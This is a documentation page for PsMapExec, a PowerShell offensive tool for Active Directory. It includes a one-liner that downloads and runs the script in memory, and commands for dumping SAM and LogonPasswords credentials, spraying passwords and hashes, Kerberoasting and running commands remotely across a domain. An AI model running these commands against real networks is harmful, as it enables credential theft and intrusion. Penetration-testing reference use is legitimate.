🔵PsMapExec

Get it on GitHub: https://github.com/The-Viper-One/PsMapExec

# Load directly into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
 PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""

# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
 
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets ""Domain Admins"" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# IPMI
PsMapExec -Targets 192.168.1.0/24 IPMI

Usage Parameters

General Parameters

Parameter	Value	Description
-Command	whoami	Runs the specified command on the remote system
-CurrentUser	N/A	Instructs PsMapExec to run in current user context. This is default when no other credentials are specified
-Domain	[Domain]	Specifies what domain to run against. Otherwise the current user domain is used
-DomainController	[DC]	Specifies what Domain controller to authenticate against
-Force	N/A	Used to force PsMapExec to run when domain or enterprise admin credentials are used
-Flush	N/A	Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.
-LocalFileServer	[IP]	Pull scripts from specified local file server address
-Module	[Module]	Specifies the module to be used for command execution
-NoBanner	N/A	Surpresses the script banner
-NoParse	N/A	Surpresses parsing of some module outputs
-Rainbow	N/A	Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".
-SuccessOnly	N/A	Shows only successful results
-Timeout	[int]	Sets the port scan timeout (ms) against the specified method.
-Threads	[int]	Sets the concurrent executions jobs to run (Default:30)

Parameter

Value

Description

-Command

whoami

Runs the specified command on the remote system

-CurrentUser

N/A

Instructs PsMapExec to run in current user context. This is default when no other credentials are specified

-Domain

[Domain]

Specifies what domain to run against. Otherwise the current user domain is used

-DomainController

[DC]

Specifies what Domain controller to authenticate against

-Force

N/A

Used to force PsMapExec to run when domain or enterprise admin credentials are used

-Flush

N/A

Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.

-LocalFileServer

[IP]

Pull scripts from specified local file server address

-Module

[Module]

Specifies the module to be used for command execution

-NoBanner

N/A

Surpresses the script banner

-NoParse

N/A

Surpresses parsing of some module outputs

-Rainbow

N/A

Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".

-SuccessOnly

N/A

Shows only successful results

-Timeout

[int]

Sets the port scan timeout (ms) against the specified method.

-Threads

[int]

Sets the concurrent executions jobs to run (Default:30)

Authentication Parameters

Parameter	Value	Description
-Hash	[RC4] or [AES256]	Hash value. Must be supplied with -Username
-LocalAuth	N/A	Used to specify when local account authentication should be used
-Password	[Password]	Password value. Must be suplied with -Username
-Ticket	[Ticket] or [Path to ticket]	B64 encoded Kerberos ticket to use for authentication. -Username is not required

Parameter

Value

Description

-Hash

[RC4] or [AES256]

Hash value. Must be supplied with -Username

-LocalAuth

N/A

Used to specify when local account authentication should be used

-Password

[Password]

Password value. Must be suplied with -Username

-Ticket

[Ticket] or [Path to ticket]

B64 encoded Kerberos ticket to use for authentication. -Username is not required

Command execution Parameters

Parameter	Value	Description
-Command	[Command]	Runs the specified command on the remote system
-Module	[Module]	Specifies the module to be used for command execution
-ShowOutput	N/A	Displays output for executed modules. Commands will still be shown

Parameter

Value

Description

-Command

[Command]

Runs the specified command on the remote system

-Module

[Module]

Specifies the module to be used for command execution

-ShowOutput

N/A

Displays output for executed modules. Commands will still be shown

Spraying Parameters

Parameter	Value	Description
-AccountAsPassword	N/A	Sprays SAM Account name values as passwords
-EmptyPassword	N/A	Sprays "blank" passwords
-SprayHash	[RC4] or [AES256]	Hash value to be used for hash spraying
-SprayPassword	[Password]	Password value to be used for hash spraying

Parameter

Value

Description

-AccountAsPassword

N/A

Sprays SAM Account name values as passwords

-EmptyPassword

N/A

Sprays "blank" passwords

-SprayHash

[RC4] or [AES256]

Hash value to be used for hash spraying

-SprayPassword

[Password]

Password value to be used for hash spraying

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).

Generally, you can mix and match various parameters across different methods and modules.

Dependencies

PsMapExec has some dependencies that need to be pulled from outside the script itself in order to function.

Primarily these are:

Kirby (PowerShell based Kerberos ticket dump)
Invoke-Pandemonium (Slightly modified Mimikatz)

There are plans to ensure long term that PsMapExec requires no external dependencies, however this requires the script to be massively reduced and AV bypasses to be considered.

Currently, they are pulled from a seperate GitHub repository: https://github.com/The-Viper-One/PME-Scripts

If you are working within an environment that has no external access or GitHub is blocked by a firewall you will need to clone the scripts in the respository onto the system from which PsMapExec is running from. PsMapExec does not currently host a HTTP server for these so you will need to use something like HFS: https://www.rejetto.com/hfs/?f=dl

PsMapExec supports pointing to a locally or alternatively hosted server for the script dependencies.

PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]

Last updated 1 month ago